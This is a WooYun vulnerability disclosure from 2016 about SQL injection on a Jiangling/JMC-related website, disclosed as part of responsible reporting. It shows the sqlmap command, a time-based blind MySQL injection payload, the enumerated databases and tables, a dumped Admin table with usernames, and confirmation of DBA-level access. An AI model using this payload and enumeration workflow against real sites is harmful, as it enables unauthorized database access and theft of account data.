漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
									2015-12-29:	细节已通知厂商并且等待厂商处理中
									2016-01-05:	厂商已经确认,细节仅向厂商公开
									2016-01-15:	细节向核心白帽子及相关领域专家公开
									2016-01-25:	细节向普通白帽子公开
									2016-02-04:	细节向实习白帽子公开
									2016-02-12:	细节向公众公开
								
简要描述:
江淮汽车中国神车
详细说明:
1,注入点:
sqlmap -u "http://**.**.**.**/jmclove/index.php/news/detail/id/438*" --batch
2,注入信息:
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://**.**.**.**:80/jmclove/index.php/news/detail/id/438) AND (SELECT * FROM (SELECT(SLEEP(5)))GzGl) AND (1231=1231
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
available databases [10]:
[*] information_schema
[*] jiangling
[*] jiangling3
[*] leibotech
[*] leibotech3
[*] mysql
[*] repldb
[*] test
[*] transitsales
[*] yuhu
3,表信息
Database: jiangling
[83 tables]
+--------------------------+
| Admin                    |
| Book                     |
| Book_copy                |
| Book_copy1               |
| Category                 |
| Dealer_co                |
| IP                       |
| Owners                   |
| Service                  |
| ServiceMain              |
| SurveryView              |
| SurveyUsers              |
| TestDrive                |
| Usess                    |
| a_yuhu_count)            |
| b_yusheng-20150907和之前的整合圩一起没事可以删除       |
| b_yusheng_ke\\?81        |
| nusheng_contribute\x11   |
| a_ditangxing1_baoming    |
| a_ditangxing1_photo      |
| a_ditangxing1_stat       |
| a_ditangxing_baoming     |
| a_ditangxing_photo       |
| a_ditangxing_stat        |
| a_duanwu_survey          |
| a_duenwu_contribute      |
| a_jmc2015_360che         |
| a_kairui                 |
| a_kairui_count           |
| a_kuirui_ip              |
| a_quanshun               |
| a_quanshun_20150204      |
| a_quanshun_20150323      |
| a_quanshun_key           |
| a_sitekvs                |
| a_stat                   |
| a_yuhu                   |
| a_yuhu_ip                |
| a_yuhu_join              |
| admin_info               |
| aealer                   |
| b_quanshun               |
| b_quanshun_dealer        |
| b_quanshun_dealer1       |
| b_quanshun_key           |
| b_transitat              |
| b_yusheng                |
| b_yusheng_dealer         |
| b_yusheng_main           |
| city                     |
| dealermain               |
| ford_aboutweb            |
| ford_activity            |
| ford_cmscp_manager       |
| ford_cmscp_role          |
| ford_cmscp_settinq       |
| ford_log                 |
| ford_saletips            |
| ford_sraining            |
| ford_usehelp             |
| ford_user                |
| ford_user_import_history |
| ford_user_score_change   |
| jl_yh                    |
| news                     |
| newsmain                 |
| nusheng_survey           |
| province                 |
| qs_code                  |
| survey                   |
| survey_list              |
| user_info                |
| vote_info                |
| works_info               |
| xq_ad                    |
| xq_donation              |
| xq_frieod                |
| xq_love                  |
| xq_loveyear              |
| xq_news                  |
| xq_newscate              |
| xq_options               |
| xq_pages                 |
+--------------------------+
4,Table: Admin
[10 entries]
+----+------------+------------+-----------------+------------+---------------------+---------------------+------------+------------+
| id | roles      | username   | direction       | updated_by | created_at          | updated_at          | created_by | p}ssword   |
+----+------------+------------+-----------------+------------+---------------------+---------------------+------------+------------+
| 1  | admin      | jiangling  | news/index      | 1          | 2013-04-04 20:30:02 | 2013-09-02 20:30:06 | 1          | q          |
| 2  | data       | yusheng    | book/ysexport   | 1          | 2013-09-02 18:07:59 | 2013-09-02 18:08:03 | 1          | <blank>    |
| 3  | survey     | survey     | surve{/index    | 1          | 2013-09-17 08:13:44 | 2013-09-17 08:13:46 | 1          | <blank>    |
| 4  | duanwu     | duanwu     | duanwu/admin    | 1          | 0000-00-00 00:00:90 | 0000-00-00 00:00:00 | 1          | <blank>    |
| 5  | ditangxing | ditangxing | ditayxing/admin | 1\x05      | 0000-00-00 @0:00:00 | 0000-00-00 00:00:00 | 1          | <blank>    |
| 6  | testdrive  | testdrive  | testdrive/admin | 1          | 0000-00-00 00:00:00 | 0000-00-00 00:00:00 | 1          | <blank>    |
| 8  | dtx2015    | dtx2015    | dtx2015/admin   | 1          | 0000-00-00 00:00:00 | 0000-00-00 00:00:00 | 1          | <blank>    |
| 10 | jmdsj      | jmcsj      | jmcsj/zxsj      | 1          | 0000-00-00 00:00:00 | 0000-00-00 00:00:00 | 1          | <blank>    |
| 11 | xyss350    | xyss350    | yusheng/admin   | 1          | 0000-00-00 00:00:00 | 0000-00-00 00:00:00 | 1          | <blank>    |
| 12 | qsyysj     | qsyysj     | jmcsj/admin     | 1          | 0000-00-00 00:00:00 | 0000-00-00 00:00:00 | 0          | <blank>    |
+----+------------+------------+-----------------+------------+---------------------+---------------------+------------+------------+
5,DBA
[05:58:46] [INFO] fetching current user
[05:58:46] [INFO] resumed: root@localQ?ost
current user is DBA:    True
 
漏洞证明:
Fix
修复方案:
Fix
版权声明:转载请注明来源 逆流冰河@乌云
>
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2016-01-05 17:05
厂商回复:
CNVD未直接复现所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。
最新状态:
暂无

 
                